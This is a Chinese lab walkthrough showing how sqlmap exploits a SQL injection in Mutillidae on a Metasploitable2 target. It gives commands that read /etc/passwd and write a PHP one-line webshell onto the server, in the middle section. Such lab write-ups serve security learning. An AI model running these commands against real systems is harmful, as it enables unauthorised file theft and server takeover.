sqlmap写入一句话木马

工具靶机——metasploitable2攻击机——kali环境——Mutillidae菜刀——蚁剑主要参数sqlmap参数：--file-read=RFILERead a file from the back-end DBMS file system从后端的数据库管理系统文件系统读取文件--file-write=WFILEWrite a ...

初学者L_言

10347人浏览 · 2019-11-26 19:24:19

初学者L_言 · 2019-11-26 19:24:19 发布

工具

靶机——metasploitable2
攻击机——kali
环境——Mutillidae
菜刀——蚁剑

主要参数

sqlmap参数：
 --file-read=RFILE   Read a file from the back-end DBMS file system        
 从后端的数据库管理系统文件系统读取文件  
 
 --file-write=WFILE  Write a local file on the back-end DBMS file system   
 编辑后端的数据库管理系统文件系统上的本地文件
 
 --file-dest=DFILE   Back-end DBMS absolute filepath to write to           
 后端的数据库管理系统写入文件的绝对路径

实现

1、打开 Mutillidae 里 User Info 测试模块
在这里插入图片描述
2、手工注入发现漏洞
具体参考：SQL手工注入原理一、手SQL工注入原理二

http://192.168.47.133/mutillidae/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details
发现 username 存在注入漏洞

3、使用 sqlmap 自动注入工具

读:
 --file-read="/etc/passwd"
sqlmap -u "http://192.168.47.133/mutillidae/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p username  --file-read="/etc/passwd"

读取的内容保存在 /root/.sqlmap/output/192.168.47.133 这目录下

在这里插入图片描述

写：(要写的文件，必须在kali本机里有)
写入到 /tmp 目录下 
 --file-write="shell.php"  --file-dest="/tmp/shell.php"
 sqlmap -u "http://192.168.47.133/mutillidae/index.php?page=user-info.php&username=a%27f%27v&password=afv&user-info-php-submit-button=View+Account+Details" -p 'username'  --file-write="shell.php"  --file-dest="/tmp/shell.php"

在这里插入图片描述

尝试写入 /var/www 目录下发现失败 (权限问题)
这时，需要利用到 DVWA里文件包含漏洞了
在介绍SQL手工注入（load_file/out file）有详细介绍如何包含本地文件，以及菜刀的连接。
请参考-SQL注入一句话木马（load_file/out file）

欢迎使用若依开源

快速构建 Web 应用程序

更多推荐

深入 Composer autoload

这几天看到 phphub 上面有人开始进坑怒看 laravel 源代码，于是我也凑个热闹来看下这个故事。众所周知 composer 是现代PHP 项目的基石，与古老的 pear 不同， composer 并不是一款专注于系统级别php 管理的包管理系统，而是基于项目的一个库管理系统。这就好比 npminstall -g 和 npminstall 的区别。而且最主要

RuoYi 若依

实体类（VO，DO，DTO）的划分

经常会接触到VO，DO，DTO的概念，本文从领域建模中的实体划分和项目中的实际应用情况两个角度，对这几个概念进行简析。得出的主要结论是：在项目应用中，VO对应于页面上需要显示的数据（表单），DO对应于数据库中存储的数据（数据表），DTO对应于除二者之外需要进行传递的数据。一、实体类百度百科中对于实体类的定义如下：实体类的主要职责是存储和管理系统内部的信息，它也可以有行为，甚至很复杂的行为，但这些行

RuoYi 若依

计算机课如何断开学生端,极域课堂管理系统怎么连接老师学生端连接问题解决方法...

现在的大学课堂都紧跟着时代的步伐，选择用电子教室代替传统的教室，电子教室的好处就是可以让坐在角落的同学也能清楚的看到老师的每一个操作，除此之外还可以电子举手，提交作业获得老师的及时反馈，学习效率倍增。如果你发现自己的电脑出现连接不上电脑的情况的，来看看小编是怎么解决的把！类别：教育管理大小：16.38M 语言：简体中文评分：61、首先，正常的学生机器是开机就会自动的连接老师端的，如果...